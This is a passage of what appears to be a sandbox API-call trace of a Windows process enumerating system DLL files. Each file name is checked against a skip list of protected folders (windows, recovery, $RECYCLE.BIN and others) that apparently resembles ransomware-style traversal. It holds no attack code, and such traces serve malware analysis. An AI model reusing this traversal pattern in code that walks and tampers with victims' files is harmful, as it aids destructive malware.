lpUsedDefaultChar=0x0) returned 39 [0067.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0067.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0067.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-localization-l1-2-0.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0067.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-localization-l1-2-0.dll", cchWideChar=39, lpMultiByteStr=0x1f84e8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-localization-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 39 [0067.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0067.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0067.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0067.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.491] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-core-processthreads-l1-1-1.dll", cAlternateFileName="API-MS~4.DLL")) returned 1 [0067.491] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2=".") returned 1 [0067.491] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="..") returned 1 [0067.491] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="...") returned 1 [0067.491] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="windows") returned -1 [0067.491] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="recovery") returned -1 [0067.491] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="perflogs") returned -1 [0067.492] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="documents and settings") returned -1 [0067.492] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.492] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="system volume information") returned -1 [0067.492] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="msocache") returned -1 [0067.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0067.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-processthreads-l1-1-1.dll", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0067.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-processthreads-l1-1-1.dll", cchWideChar=41, lpMultiByteStr=0x1f8328, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-processthreads-l1-1-1.dll", lpUsedDefaultChar=0x0) returned 41 [0067.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0067.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0067.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-processthreads-l1-1-1.dll", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0067.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-processthreads-l1-1-1.dll", cchWideChar=41, lpMultiByteStr=0x1f84e8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-processthreads-l1-1-1.dll", lpUsedDefaultChar=0x0) returned 41 [0067.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0067.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0067.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0067.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.492] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-core-synch-l1-2-0.dll", cAlternateFileName="APF10C~1.DLL")) returned 1 [0067.492] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2=".") returned 1 [0067.492] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="..") returned 1 [0067.492] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="...") returned 1 [0067.492] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="windows") returned -1 [0067.492] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="recovery") returned -1 [0067.492] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="perflogs") returned -1 [0067.492] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="documents and settings") returned -1 [0067.492] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.492] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="system volume information") returned -1 [0067.492] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="msocache") returned -1 [0067.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0067.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-synch-l1-2-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0067.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-synch-l1-2-0.dll", cchWideChar=32, lpMultiByteStr=0x1f84e8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-synch-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 32 [0067.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0067.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0067.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-synch-l1-2-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0067.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-synch-l1-2-0.dll", cchWideChar=32, lpMultiByteStr=0x1f8328, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-synch-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 32 [0067.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0067.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0067.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0067.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.493] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-core-timezone-l1-1-0.dll", cAlternateFileName="AP7902~1.DLL")) returned 1 [0067.493] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2=".") returned 1 [0067.493] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="..") returned 1 [0067.493] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="...") returned 1 [0067.493] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="windows") returned -1 [0067.493] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="recovery") returned -1 [0067.493] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="perflogs") returned -1 [0067.493] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="documents and settings") returned -1 [0067.493] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.493] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="system volume information") returned -1 [0067.493] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="msocache") returned -1 [0067.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0067.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-timezone-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0067.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-timezone-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x1f8328, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-timezone-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 35 [0067.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0067.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0067.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-timezone-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0067.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-timezone-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x1f84e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-timezone-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 35 [0067.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0067.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0067.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.494] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-core-xstate-l2-1-0.dll", cAlternateFileName="APA632~1.DLL")) returned 1 [0067.494] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2=".") returned 1 [0067.494] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="..") returned 1 [0067.494] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="...") returned 1 [0067.494] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="windows") returned -1 [0067.494] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="recovery") returned -1 [0067.494] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="perflogs") returned -1 [0067.494] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="documents and settings") returned -1 [0067.494] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.494] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="system volume information") returned -1 [0067.494] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="msocache") returned -1 [0067.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0067.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-xstate-l2-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0067.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-xstate-l2-1-0.dll", cchWideChar=33, lpMultiByteStr=0x1f84e8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-xstate-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0067.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0067.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0067.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-xstate-l2-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0067.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-xstate-l2-1-0.dll", cchWideChar=33, lpMultiByteStr=0x1f8328, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-xstate-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0067.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0067.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0067.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0067.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.494] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-crt-conio-l1-1-0.dll", cAlternateFileName="AP5C76~1.DLL")) returned 1 [0067.494] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2=".") returned 1 [0067.494] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="..") returned 1 [0067.494] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="...") returned 1 [0067.494] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="windows") returned -1 [0067.494] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="recovery") returned -1 [0067.494] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="perflogs") returned -1 [0067.494] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="documents and settings") returned -1 [0067.494] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.495] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="system volume information") returned -1 [0067.495] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="msocache") returned -1 [0067.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-conio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0067.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-conio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-conio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0067.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-conio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0067.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0067.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-conio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x241290, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-conio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0067.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0067.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0067.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.495] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x58c0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-crt-convert-l1-1-0.dll", cAlternateFileName="APFD9C~1.DLL")) returned 1 [0067.495] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2=".") returned 1 [0067.495] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="..") returned 1 [0067.495] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="...") returned 1 [0067.495] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="windows") returned -1 [0067.495] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="recovery") returned -1 [0067.495] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="perflogs") returned -1 [0067.495] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="documents and settings") returned -1 [0067.495] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.495] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="system volume information") returned -1 [0067.495] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="msocache") returned -1 [0067.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0067.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-convert-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0067.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-convert-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x1f84e8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-convert-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0067.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0067.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0067.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-convert-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0067.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-convert-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x1f8328, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-convert-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0067.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0067.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0067.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0067.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.496] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-crt-environment-l1-1-0.dll", cAlternateFileName="APC00F~1.DLL")) returned 1 [0067.496] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2=".") returned 1 [0067.496] lstrcmpiW 